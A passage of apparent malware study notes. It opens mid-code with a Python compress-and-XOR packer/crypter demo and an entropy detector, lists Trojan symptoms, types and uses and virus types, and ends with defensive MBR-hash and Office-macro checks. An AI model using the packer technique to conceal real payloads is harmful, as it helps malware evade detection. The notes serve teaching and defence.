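def pack_and_crypt(payload: bytes, key: bytes = XOR_KEY) -> bytes:
    """Packer step (compress) followed by crypter step (encode)."""
    return xor_stream(zlib.compress(payload, 9), key)


def unpack(blob: bytes, key: bytes = XOR_KEY) -> bytes:
    """What the loader stub does at run time: undo the crypter, then the packer."""
    return zlib.decompress(xor_stream(blob, key))


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Detection heuristic: compressed or encrypted bodies approach 8 bits/byte,
    while ordinary code and text sit well below the threshold."""
    return shannon_entropy(data) >= threshold
```

The heuristic also fires on legitimate archives and installers, so treat it as a triage signal rather than a verdict. It does explain why file hashes of the outer sample change with every rebuild while the unpacked body recovered from memory stays the same.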

Trojan Indications

  • The DVD-ROM drawer opens and closes automatically.
  • The computer screen blinks, flips upside down, or is inverted so that everything is displayed backward.
  • Printers automatically start printing documents.
  • A web page suddenly opens without input from the user.
  • The color settings of the operating system change automatically.
  • Screensavers change to a personal scrolling message or advertisements.
  • The sound volume suddenly fluctuates.
  • The date and time of the computer change.
  • The mouse cursor moves by itself.
  • The left- and right-click functions of the mouse are interchanged.
  • The mouse pointer disappears completely.
  • The mouse pointer automatically clicks on icons and is uncontrollable.
  • The Windows Start button disappears.
  • Pop-ups with bizarre messages appear unexpectedly.
  • Clipboard images/text appear to have been manipulated.
  • The keyboard and mouse freeze.
  • Contacts receive emails that the user did not send.
  • Strange warnings or question boxes appear.
  • The system turns off and restarts in an unusual way.
  • The taskbar disappears automatically.
  • Task Manager is disabled (a Trojan can set the DisableTaskMgr policy value in the registry).
  • Antivirus programs are automatically disabled, or their files are corrupted, altered or deleted.

Types of Trojans

  • Remote Access Trojans (RATs) give attackers full control of the victim's system to remotely access files and private conversations.
  • Backdoor Trojans install a program that bypasses standard authentication, giving the attacker persistent access to the victim's computer without the user's knowledge and without detection.
  • Botnet Trojans infect large numbers of computers to build a botnet that the bot herder commands, for example to launch DDoS attacks or send spam against chosen targets.
  • Rootkit Trojans are designed to obtain administrator-level access and then hide themselves, which makes them hard to detect by inspecting services, the task list, or the registry.
  • E-banking Trojans intercept account information before the system encrypts it and send it to the attacker's command-and-control server.

Trojan Uses

  • Deleting critical operating system files.
  • Disabling firewalls and antivirus.
  • Creating backdoors to gain remote access.
  • Using a victim's PC for spamming.
  • Stealing personal information such as security codes and passwords.
  • Downloading spyware, adware and other malware.
  • Encrypting data and locking victims out of the system.

Types of Viruses

  • System or boot sector viruses infect system sectors, including the master boot record (MBR) and the DOS boot record, so the virus code runs before the operating system loads.
  • Email attachments and removable media (USB drives) are the primary carriers by which viruses reach a system.
  • File viruses infect files that are executed or interpreted on the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files, by inserting their code into the original executable file.
  • Multipartite viruses (hybrid viruses) combine the approaches of file infectors and boot record infectors, attacking both the boot sector and executable/program files.
  • Macro viruses infect Microsoft Word and similar Office applications; they are written in the applications' macro language, Visual Basic for Applications (VBA).
  • Cluster viruses modify directory table entries so that they point to the virus code, infecting files without changing the files themselves or planting additional files.
  • Stealth/tunneling viruses intercept and alter the system services that antivirus programs rely on (interrupt handlers, file-system calls) so that scans return clean-looking results and the virus stays hidden.
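As an added example (not part of the original notes), the following Python code shows two checks that follow from the list above: parsing a master boot record to confirm the 0x55AA signature and the partition table, then comparing the boot-code area against a known-good hash, which is how a boot-sector infection is actually caught; and looking inside an Office OOXML file for the vbaProject.bin part that holds macros. The MBR bytes, the "infection" and the document are all constructed in the code; legacy binary .doc files need an OLE parser instead of a zip reader.

```python
import hashlib
import io
import struct
import zipfile

MBR_SIZE = 512
PART_TABLE_OFFSET = 446          # boot code occupies bytes 0..445
PART_ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"     # last two bytes of a valid MBR
PART_ENTRY_FMT = "<B3sB3sII"     # status, CHS start, type, CHS end, LBA, count


def build_sample_mbr() -> bytes:
    """Constructed MBR: placeholder boot code plus one bootable NTFS partition."""
    code = (b"\xfa\x33\xc0" + b"CONSTRUCTED-BOOT-CODE").ljust(PART_TABLE_OFFSET, b"\x00")
    entry = struct.pack(PART_ENTRY_FMT, 0x80, b"\x20\x21\x00", 0x07,
                        b"\xfe\xff\xff", 2048, 204800)
    table = entry + bytes(PART_ENTRY_SIZE * 3)   # three unused slots
    return code + table + BOOT_SIGNATURE


def parse_mbr(sector: bytes) -> dict:
    """Signature check plus the non-empty partition entries."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    parts = []
    for i in range(4):
        off = PART_TABLE_OFFSET + i * PART_ENTRY_SIZE
        status, _, ptype, _, lba, count = struct.unpack(
            PART_ENTRY_FMT, sector[off:off + PART_ENTRY_SIZE])
        if ptype != 0:
            parts.append({"bootable": status == 0x80, "type": ptype,
                          "lba_start": lba, "sectors": count})
    return {"valid_signature": sector[-2:] == BOOT_SIGNATURE, "partitions": parts}


def boot_code_hash(sector: bytes) -> str:
    """Hash the code area only: the partition table may legitimately change."""
    return hashlib.sha256(sector[:PART_TABLE_OFFSET]).hexdigest()


def simulate_boot_sector_infection(sector: bytes) -> bytes:
    """Overwrite the start of the boot code the way an infector would, leaving
    the partition table and signature intact (constructed bytes, not real code)."""
    patched = b"\xeb\x3c" + b"X" * 14            # hypothetical jump to a virus body
    return patched + sector[len(patched):]


def boot_code_changed(baseline_hash: str, sector: bytes) -> bool:
    """The signature still validates after infection; only the hash catches it."""
    return boot_code_hash(sector) != baseline_hash


def build_sample_docx(with_macro: bool) -> bytes:
    """Minimal constructed OOXML container, optionally with a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0constructed")
    return buf.getvalue()


def has_vba_project(document: bytes) -> bool:
    """Macros in .docm/.xlsm/.pptm live in a vbaProject.bin part of the zip."""
    with zipfile.ZipFile(io.BytesIO(document)) as z:
        return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
```

Record boot_code_hash() of a known-good sector when a machine is built; a later mismatch with a still-valid 0x55AA signature is exactly the boot-sector infection pattern, and the partition table can be kept out of the hash so that legitimate repartitioning does not raise false alarms.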
